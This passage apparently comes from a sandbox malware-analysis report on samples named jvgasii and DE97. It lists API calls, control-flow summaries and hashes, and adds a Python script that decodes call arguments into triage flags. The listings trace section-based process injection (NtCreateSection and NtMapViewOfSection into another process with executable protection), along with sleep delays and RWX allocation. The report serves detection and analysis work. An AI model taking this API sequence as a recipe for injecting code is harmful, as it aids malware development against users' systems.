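        g = parse_cfg(line)
        entry = g["nodes"][g["entry"]]["range"].split("-")[0]
        checked = calls_followed_by_branch(g)
        looping = [n for n in checked if in_loop(g, n)]
        print(f"0x{entry}: result-checked calls {checked}, inside a loop: {looping}")
```

For the Toolhelp32 function the same parse shows that the CreateToolhelp32Snapshot block (395) is both result-checked and inside a loop (395 -> 397 -> 404 -> 394 -> 395), i.e. the snapshot is retried, while the Module32First block is result-checked but not looped.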

                                                                                                                             Control-flow Graph
                                                                                                                            control_flow_graph 409 4016e5 410 4016e7 409->410 411 4016ec-4016f0 409->411 410->411 412 4016e9 410->412 413 4016f2-401725 411->413 414 401716-401737 411->414 412->411 413->414 421 40173a-401771 414->421 433 401773-40179c 421->433 438 4017a6 433->438 439 40179e-4017a4 433->439 440 4017ac-4017b2 438->440 439->440 441 4017c2-4017c6 440->441 442 4017b4-4017c0 440->442 441->440 443 4017c8-4017cd 441->443 442->441 444 401835-401844 443->444 445 4017cf call 4017d4 443->445 447 401847-40184a 444->447 445->444 448 401874-4018b7 HeapCreate 447->448 449 40184c-401856 447->449 459 4018c5 448->459 460 4018bc-4018e3 call 401193 448->460 451 401859-401862 449->451 452 401870 451->452 453 401864-40186e 451->453 452->451 455 401872 452->455 453->452 455->447 459->460
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516620134.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_400000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c9d1cf4a24c3fc6c96abbd772e43917d0267fad9e090bec43cac2cfb706a48c3
                                                                                                                            • Instruction ID: d7122d48263ec7d897cf7d78cd76de1228cda3bcac40411fc7d625d9091ea59c
                                                                                                                            • Opcode Fuzzy Hash: c9d1cf4a24c3fc6c96abbd772e43917d0267fad9e090bec43cac2cfb706a48c3
                                                                                                                            • Instruction Fuzzy Hash: AC41CE37908104DBDB14AA54C844ABA73A1AF84304F39853BD857776F0D67CAA43E79F

                                                                                                                             Control-flow Graph
                                                                                                                            control_flow_graph 467 4018e6-40194b call 401193 Sleep call 40141f 481 40195a-4019a5 call 401193 467->481 482 40194d-401955 call 401514 467->482 482->481
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516620134.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_400000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1885482327-0
                                                                                                                            • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                                            • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                                                                            • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                                            • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F
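The argument values in the APIs lists are raw hex, so the constants that matter for triage (memory protections, snapshot flags, section attributes, the duplicate-handle option) have to be decoded by hand. The Python below is an added example, not part of the report, that parses the `API.Module(args), ref: addr` lines from the listings above (copied into a constructed sample string), names each parameter from the documented Win32/Nt signatures, decodes the constants, and emits the findings a triage analyst would want flagged: a PAGE_EXECUTE_READWRITE protection, the SetErrorMode(0x400)/SetErrorMode(0) pair, a TH32CS_SNAPMODULE snapshot, the 5 s Sleep, and the NtCreateSection(SEC_COMMIT, PAGE_READWRITE) followed by NtMapViewOfSection chain inside subcall 0x401514. The 0x224 shown for Module32First equals 548, which is sizeof(MODULEENTRY32) on 32-bit Windows, and the decoder labels it as such. The report prints 000000FF for the process-handle arguments; the decoder leaves that as hex rather than assuming it is the -1 current-process pseudo-handle. The finding names and thresholds are this example's own choices.

```python
import re

# Constructed sample: API lines copied from the function listings above.
REPORT_API_LINES = """
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006B024D
• GetModuleHandleW.KERNEL32(00514D70), ref: 00418BCF
• GetProcAddress.KERNEL32(00000000,0041F298), ref: 00418C0C
• VirtualProtect.KERNELBASE(00514BB4,00514D6C,00000040,?), ref: 00418C2B
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007E0B0F
• Module32First.KERNEL32(00000000,00000224), ref: 007E0B2F
• SetErrorMode.KERNELBASE(00000400,?,?,006B0223,?,?), ref: 006B0E19
• SetErrorMode.KERNELBASE(00000000,?,?,006B0223,?,?), ref: 006B0E1E
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
"""

LINE = re.compile(r"(?:Part of subcall function ([0-9A-F]+): )?(\w+)\.(\w+)\((.*?)\), ref: ([0-9A-F]+)")

# Documented Win32 / Nt constants used by the decoders below.
PAGE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
        0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
        0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM = [(0x1000, "MEM_COMMIT"), (0x2000, "MEM_RESERVE"), (0x100000, "MEM_TOP_DOWN")]
TH32 = [(0x1, "TH32CS_SNAPHEAPLIST"), (0x2, "TH32CS_SNAPPROCESS"), (0x4, "TH32CS_SNAPTHREAD"),
        (0x8, "TH32CS_SNAPMODULE"), (0x10, "TH32CS_SNAPMODULE32")]
SECTION = [(0x1, "SECTION_QUERY"), (0x2, "SECTION_MAP_WRITE"), (0x4, "SECTION_MAP_READ"),
           (0x8, "SECTION_MAP_EXECUTE"), (0x10, "SECTION_EXTEND_SIZE")]
SEC = [(0x800000, "SEC_FILE"), (0x1000000, "SEC_IMAGE"), (0x4000000, "SEC_RESERVE"), (0x8000000, "SEC_COMMIT")]
DUP = [(0x1, "DUPLICATE_CLOSE_SOURCE"), (0x2, "DUPLICATE_SAME_ACCESS")]
INHERIT = {1: "ViewShare", 2: "ViewUnmap"}


def bits(value, table):
    """Render a bit-flag value symbolically; unknown leftover bits stay hex."""
    names = [n for b, n in table if value & b]
    rest = value & ~sum(b for b, _ in table)
    if rest:
        names.append(hex(rest))
    return "|".join(names) or "0"


def page(value):
    base = PAGE.get(value & 0xFF, hex(value & 0xFF))
    mods = bits(value & ~0xFF, [(0x100, "PAGE_GUARD"), (0x200, "PAGE_NOCACHE"), (0x400, "PAGE_WRITECOMBINE")])
    return base if mods == "0" else f"{base}|{mods}"


# Documented parameter names, plus decoders for the positions that carry constants.
SIGS = {
    "VirtualAlloc": (["lpAddress", "dwSize", "flAllocationType", "flProtect"], {2: lambda v: bits(v, MEM), 3: page}),
    "VirtualProtect": (["lpAddress", "dwSize", "flNewProtect", "lpflOldProtect"], {2: page}),
    "CreateToolhelp32Snapshot": (["dwFlags", "th32ProcessID"], {0: lambda v: bits(v, TH32)}),
    # 0x224 = 548 = sizeof(MODULEENTRY32) on 32-bit Windows.
    "Module32First": (["hSnapshot", "lpme"], {1: lambda v: "sizeof(MODULEENTRY32)" if v == 548 else hex(v)}),
    "SetErrorMode": (["uMode"], {}),
    "Sleep": (["dwMilliseconds"], {0: lambda v: f"{v} ms"}),
    "NtDuplicateObject": (["SourceProcessHandle", "SourceHandle", "TargetProcessHandle", "TargetHandle",
                           "DesiredAccess", "HandleAttributes", "Options"], {6: lambda v: bits(v, DUP)}),
    "NtCreateSection": (["SectionHandle", "DesiredAccess", "ObjectAttributes", "MaximumSize",
                         "SectionPageProtection", "AllocationAttributes", "FileHandle"],
                        {1: lambda v: bits(v, SECTION), 4: page, 5: lambda v: bits(v, SEC)}),
    "NtMapViewOfSection": (["SectionHandle", "ProcessHandle", "BaseAddress", "ZeroBits", "CommitSize",
                            "SectionOffset", "ViewSize", "InheritDisposition", "AllocationType", "Win32Protect"],
                           {7: lambda v: INHERIT.get(v, hex(v)), 9: page}),
}


def parse_api_lines(text):
    """One dict per '• API.Module(args), ref: addr' line, in report order."""
    calls = []
    for sub, api, module, raw, ref in LINE.findall(text):
        args = [None if a == "?" else int(a, 16) for a in raw.split(",")] if raw else []
        calls.append({"api": api, "module": module, "args": args, "ref": ref, "subcall_of": sub or None})
    return calls


def decode(call):
    """Map positional hex arguments to parameter names and symbolic constants."""
    names, decoders = SIGS.get(call["api"], ([], {}))
    out = {}
    for i, v in enumerate(call["args"]):
        name = names[i] if i < len(names) else f"arg{i}"
        out[name] = "?" if v is None else (decoders[i](v) if i in decoders else hex(v))
    return out


def findings(calls):
    """Triage flags over the call list; each is 'kind@ref' so it can be cross-referenced."""
    out = []
    for i, c in enumerate(calls):
        d = decode(c)
        if (d.get("flProtect") or d.get("flNewProtect") or "").startswith("PAGE_EXECUTE_READWRITE"):
            out.append(f"rwx:{c['api']}@{c['ref']}")
        if (c["api"] == "SetErrorMode" and c["args"][0] == 0x400 and i + 1 < len(calls)
                and calls[i + 1]["api"] == "SetErrorMode" and calls[i + 1]["args"][0] == 0):
            out.append(f"errormode-roundtrip@{c['ref']}")
        if c["api"] == "CreateToolhelp32Snapshot" and c["args"][0] & 0x8:
            out.append(f"module-snapshot@{c['ref']}")
        if c["api"] == "Sleep" and c["args"][0] >= 1000:
            out.append(f"sleep:{c['args'][0]}ms@{c['ref']}")
        if c["api"] == "NtCreateSection" and c["args"][5] & 0x8000000:
            maps = [m for m in calls[i + 1:] if m["api"] == "NtMapViewOfSection" and m["subcall_of"] == c["subcall_of"]]
            if maps:
                out.append(f"section-map@{c['ref']}->{maps[0]['ref']}")
    return out


if __name__ == "__main__":
    calls = parse_api_lines(REPORT_API_LINES)
    for c in calls:
        print(f"{c['ref']} {c['api']} {decode(c)}")
    print(findings(calls))
```

The section-map finding is the one to follow up in a full report: NtCreateSection with SEC_COMMIT and PAGE_READWRITE followed by NtMapViewOfSection is the shape of section-based code injection, and the next question is whether a later NtMapViewOfSection in the same subcall uses a process handle other than the caller's own.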

                                                                                                                             Control-flow Graph
                                                                                                                            control_flow_graph 496 401915-401918 497 4018c6-4018c7 496->497 498 40191a-40194b call 401193 Sleep call 40141f 496->498 499 4018d7 497->499 500 4018ce-4018e3 call 401193 497->500 510 40195a-4019a5 call 401193 498->510 511 40194d-401955 call 401514 498->511 499->500 511->510
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516620134.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_400000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1885482327-0
                                                                                                                            • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                                            • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                                                                            • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                                            • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                                                                                             Control-flow Graph
                                                                                                                            control_flow_graph 525 4018f1-40194b call 401193 Sleep call 40141f 535 40195a-4019a5 call 401193 525->535 536 40194d-401955 call 401514 525->536 536->535
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516620134.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_400000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1885482327-0
                                                                                                                            • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                                            • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                                                                            • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                                            • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516620134.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_400000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1885482327-0
                                                                                                                            • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                                            • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                                                                            • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                                            • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007E07F7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2517016123.00000000007DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 007DD000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_7dd000_jvgasii.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                            • Instruction ID: 87d50c798d86d2e63bb831bfa1218a57fb5ecba0c6fa302f1ff768abe5681920
                                                                                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                            • Instruction Fuzzy Hash: 14113C79A00208EFDB01DF99C985E98BBF5EF08750F0580A4F9489B362D375EA90DF80
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516620134.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_400000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1885482327-0
                                                                                                                            • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                                            • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                                                                            • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                                            • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                                                                                                            APIs
                                                                                                                            • LocalAlloc.KERNELBASE(00000000,00514D6C,0041912F), ref: 00418AC8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516656554.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_40b000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocLocal
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3494564517-0
                                                                                                                            • Opcode ID: c76493f27e26a282c6c9cfafab8c2d46abc60ae80d7b28fbf0ef9f8fe527b2c1
                                                                                                                            • Instruction ID: 452ad643668a9869e20cf026667031a7807d1b47aa2963159c3e27e96442b96b
                                                                                                                            • Opcode Fuzzy Hash: c76493f27e26a282c6c9cfafab8c2d46abc60ae80d7b28fbf0ef9f8fe527b2c1
                                                                                                                            • Instruction Fuzzy Hash: F0B012B094A2009FDB00CF90FC44B903BB4F358702F00D061F500C1160D7304404EF16
                                                                                                                            APIs
                                                                                                                            • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00418D84
                                                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418D9F
                                                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 00418DC2
                                                                                                                            • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00418DD1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516656554.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_40b000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2776817195-0
                                                                                                                            • Opcode ID: f30173706c358a0a2784e69d0405cb642d2262f11b42eed8560d13ebc88a1c06
                                                                                                                            • Instruction ID: e6d39fe0092bbab876aaf39b699cc254fd154f119dceba652d6ce7d41ca7bd17
                                                                                                                            • Opcode Fuzzy Hash: f30173706c358a0a2784e69d0405cb642d2262f11b42eed8560d13ebc88a1c06
                                                                                                                            • Instruction Fuzzy Hash: CD01D870A402049BD760AFA4FC45BDA37B4E71C705F40806AF605962D0DE745988DF9A
                                                                                                                            APIs
                                                                                                                            • BuildCommDCBA.KERNEL32(00000000,?), ref: 00418CE4
                                                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418CF6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516656554.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_40b000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuildCommEnvironmentFreeStrings
                                                                                                                            • String ID: -
                                                                                                                            • API String ID: 2991353152-2547889144
                                                                                                                            • Opcode ID: 8d08779753d9f8bcff46eaf4c583cf6f56908dff42d916d2df929441dec03c69
                                                                                                                            • Instruction ID: 810f788c3858191b0e6f136e57086e392da7284b159ae35535647157417a7ca4
                                                                                                                            • Opcode Fuzzy Hash: 8d08779753d9f8bcff46eaf4c583cf6f56908dff42d916d2df929441dec03c69
                                                                                                                            • Instruction Fuzzy Hash: 7CF0C83150530496E7119FA5ED807EE7B69EB19320F60422EED0456281CB784D8597AA

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:12%
                                                                                                                            Dynamic/Decrypted Code Coverage:16.5%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:176
                                                                                                                            Total number of Limit Nodes:8

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            APIs
                                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415ABA
                                                                                                                            • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00415AC7
                                                                                                                            • FindAtomA.KERNEL32(00000000), ref: 00415ACE
                                                                                                                            • GetConsoleMode.KERNEL32(00000000,00000000), ref: 00415AD6
                                                                                                                            • SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415AEE
                                                                                                                            • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00415B15
                                                                                                                            • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 00415B1E
                                                                                                                            • ConnectNamedPipe.KERNEL32(?,00000000), ref: 00415B32
                                                                                                                            • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00415B77
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00415B86
                                                                                                                            • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00415B8F
                                                                                                                            • ReleaseSemaphore.KERNEL32(00000000,00000000,00000000), ref: 00415BA1
                                                                                                                            • SetCommState.KERNELBASE(00000000,00000000), ref: 00415BC8
                                                                                                                            • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415BF9
                                                                                                                            • GetComputerNameW.KERNEL32(?,?), ref: 00415C0D
                                                                                                                            • GetTimeFormatA.KERNEL32(00000000,00000000,?,00417314,?,00000000), ref: 00415C4D
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00415C54
                                                                                                                            • GetConsoleAliasExesLengthW.KERNEL32 ref: 00415C5A
                                                                                                                            • GetBinaryTypeW.KERNEL32(00417334,?), ref: 00415C6C
                                                                                                                            • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00415C7F
                                                                                                                            • GetLongPathNameA.KERNEL32(00417364,?,00000000), ref: 00415C92
                                                                                                                            • GetCommState.KERNEL32(00000000,00000000), ref: 00415C9A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777292131.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_40b000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Console$CommFileName$FormatLengthPathReadStateTime$AdjustmentAliasAliasesAtomAttributesBinaryCompareComputerConfigConnectCopyDefaultExchangeExesFindInterlockedLongMessageModeModuleNamedOutputPipeReleaseSearchSemaphoreSystemType
                                                                                                                            • String ID: @3#v$P4#vp^5w$k`$}$
                                                                                                                            • API String ID: 3800548968-402751238
                                                                                                                            • Opcode ID: 5e6c1ea0dd6b9c12ce414f54bdebe71c2c6476f5e84dd2541a6dae526580182b
                                                                                                                            • Instruction ID: b74f69d15b1c00e371bae04283b2e7407a3b84b28a54ffdc86722d59f2fd5859
                                                                                                                            • Opcode Fuzzy Hash: 5e6c1ea0dd6b9c12ce414f54bdebe71c2c6476f5e84dd2541a6dae526580182b
                                                                                                                            • Instruction Fuzzy Hash: 6CB11671841528EBD725DB61DC48EEF7B78EF49350F0180AAF609A2150DB789AC1CFAD

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 934dc258b1fd10f4e66b4cbfde8a53cb0d8b0c8237b07dea73acb5d59905d160
                                                                                                                            • Instruction ID: 8456862ab07ee4fd5df19115d19177d22808884b2e91bbb4bd05fd593ecc01b1
                                                                                                                            • Opcode Fuzzy Hash: 934dc258b1fd10f4e66b4cbfde8a53cb0d8b0c8237b07dea73acb5d59905d160
                                                                                                                            • Instruction Fuzzy Hash: CFA1E3B1604215BFDF218F95CC45FAB7BB8EF82710F14006BE942BB1E1D6399902DB5A

                                                                                                                             Control-flow Graph (rendered graph not reproduced; first basic block 4015fb-401604)
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                                                                                            • Instruction ID: eff60cd738278fe88036fd12be8a847ac689736a027776baabbfcbb81c570d02
                                                                                                                            • Opcode Fuzzy Hash: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                                                                                            • Instruction Fuzzy Hash: 20512DB4900205BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759945CB64

                                                                                                                             Control-flow Graph (rendered graph not reproduced; first basic block 401613-40162c)
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
